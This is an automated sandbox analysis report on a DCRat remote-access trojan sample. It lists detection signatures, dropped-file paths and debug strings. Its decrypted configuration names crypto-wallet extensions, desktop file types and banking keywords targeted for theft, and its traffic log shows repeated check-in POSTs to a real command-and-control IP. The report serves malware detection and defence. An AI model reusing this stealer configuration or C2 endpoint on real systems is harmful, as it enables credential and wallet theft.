Windows Analysis Report
fDTPlvsGfH.exe

Overview

General Information

Sample name: fDTPlvsGfH.exe
(renamed because the original name is a hash value)
Original sample name: B8298EE526BB093E3C96686D26D1361F.exe
Analysis ID: 1428989
MD5: b8298ee526bb093e3c96686d26d1361f
SHA1: 583ff162c74e864d77323b76355f175aab170e1f
SHA256: 08d8919249b3f442106283b5a413eaff6b6b3d9ca76ec7c3a88101b54bab0fe4
Tags: DCRat, exe

Detection

DCRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected DCRat
.NET source code contains potential unpacker
.NET source code contains very large strings
Adds a directory exclusion to Windows Defender
Drops PE files with benign system names
Drops executable to a common third party application directory
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection

Source: fDTPlvsGfH.exe Avira: detected
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: C:\Users\user\Desktop\GOHxPPGn.log Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\AppData\Local\Temp\46FAiS0S6O.bat Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\DSloixRU.log Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\csrss.exe Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe ReversingLabs: Detection: 78%
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe ReversingLabs: Detection: 78%
Source: C:\Recovery\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe ReversingLabs: Detection: 78%
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\csrss.exe ReversingLabs: Detection: 78%
Source: C:\Users\user\Desktop\KySWwqSG.log ReversingLabs: Detection: 66%
Source: C:\Users\user\Desktop\qZchTloU.log ReversingLabs: Detection: 66%
Source: C:\Windows\Downloaded Program Files\MoUsoCoreWorker.exe ReversingLabs: Detection: 78%
Source: fDTPlvsGfH.exe ReversingLabs: Detection: 78%
Source: C:\Users\user\Desktop\DYQGISGu.log Joe Sandbox ML: detected
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\csrss.exe Joe Sandbox ML: detected
Source: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\AhGYbjHb.log Joe Sandbox ML: detected
Source: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\ICLFBdCl.log Joe Sandbox ML: detected
Source: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Joe Sandbox ML: detected
Source: fDTPlvsGfH.exe Joe Sandbox ML: detected
Source: fDTPlvsGfH.exe String decryptor: {"0":[],"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"},"8c7d95c1-4def-4a0e-952b-f3c453358f2e":{"_0":"Desktop|{SYSTEMDRIVE}/Users/{USERNAME}/Desktop/|*.txt;*.cs;*.lua;*.asi;*.json;*.ini;*.word;*.xlsx;*.jpg|1000|t","_1":"Group name"},"d1159ac1-2243-45e3-9bad-55df4f7732e9":{"_0":"crypto;bank;authorization;account","_1":"1500","_2":"15","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds","_1":""}}
Source: fDTPlvsGfH.exe String decryptor: ["fexzkGy6q0p5cabyKHmX0UutTLWzT0rof1cIzvz8iKLEdDxO5xG4fc6KuDfYt8m0JAal8T9YRoyqIqQQYI3ftwIC4RYvQaOjhV4cnLPmysm1oQCDwP9kEHGX1Yqr5NI1","e32e8e8116ffca3524c66ea65e2eea691227f6f4e844f9dca8aabb77b799c790","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJeElpd2lJaXdpWlhsSmQwbHFiMmxsTVU1YVZURlNSbFJWVWxOVFZscEdabE01Vm1NeVZubGplVGhwVEVOSmVFbHFiMmxhYlVaell6SlZhVXhEU1hsSmFtOXBaRWhLTVZwVFNYTkphazFwVDJsS01HTnVWbXhKYVhkcFRrTkpOa2x1VW5sa1YxVnBURU5KTVVscWIybGtTRW94V2xOSmMwbHFXV2xQYVVvd1kyNVdiRWxwZDJsT2VVazJTVzVTZVdSWFZXbE1RMGswU1dwdmFXUklTakZhVTBselNXcHJhVTlwU2pCamJsWnNTV2wzYVUxVVFXbFBhVW93WTI1V2JFbHBkMmxOVkVWcFQybEtNR051Vm14SmFYZHBUVlJKYVU5cFNqQmpibFpzU1dsM2FVMVVUV2xQYVVvd1kyNVdiRWxwZDJsTlZGRnBUMmxLTUdOdVZteEpiakE5SWwwPSJd"]

Compliance

Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Unpacked PE file: 0.2.fDTPlvsGfH.exe.2580000.4.unpack
Source: fDTPlvsGfH.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Directory created: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Directory created: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\ebcca32ff60686
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Directory created: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Directory created: C:\Program Files\Windows Portable Devices\ebcca32ff60686
Source: fDTPlvsGfH.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: eC:/Users/user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: xC:/Users/user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: |C:/Users/user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: gC:/Users/user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ~C:/Users/user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: yC:/Users/user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: mC:/Users/user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: }C:/Users/user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wC:/Users/user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: vC:/Users/user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000003796000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: kC:/Users/user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000003796000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File opened: C:\Users\user
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Code function: 4x nop then jmp 00007FFD9B8BDFC6h 0_2_00007FFD9B8BDDAD

Networking

Source: Traffic Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49730 -> 109.107.182.145:80
Source: Joe Sandbox View ASN Name: TELEPORT-TV-ASRU TELEPORT-TV-ASRU
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 384Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2564Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 384Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 1440Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2144Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2144Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2144Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2136Expect: 100-continueConnection: Keep-Alive
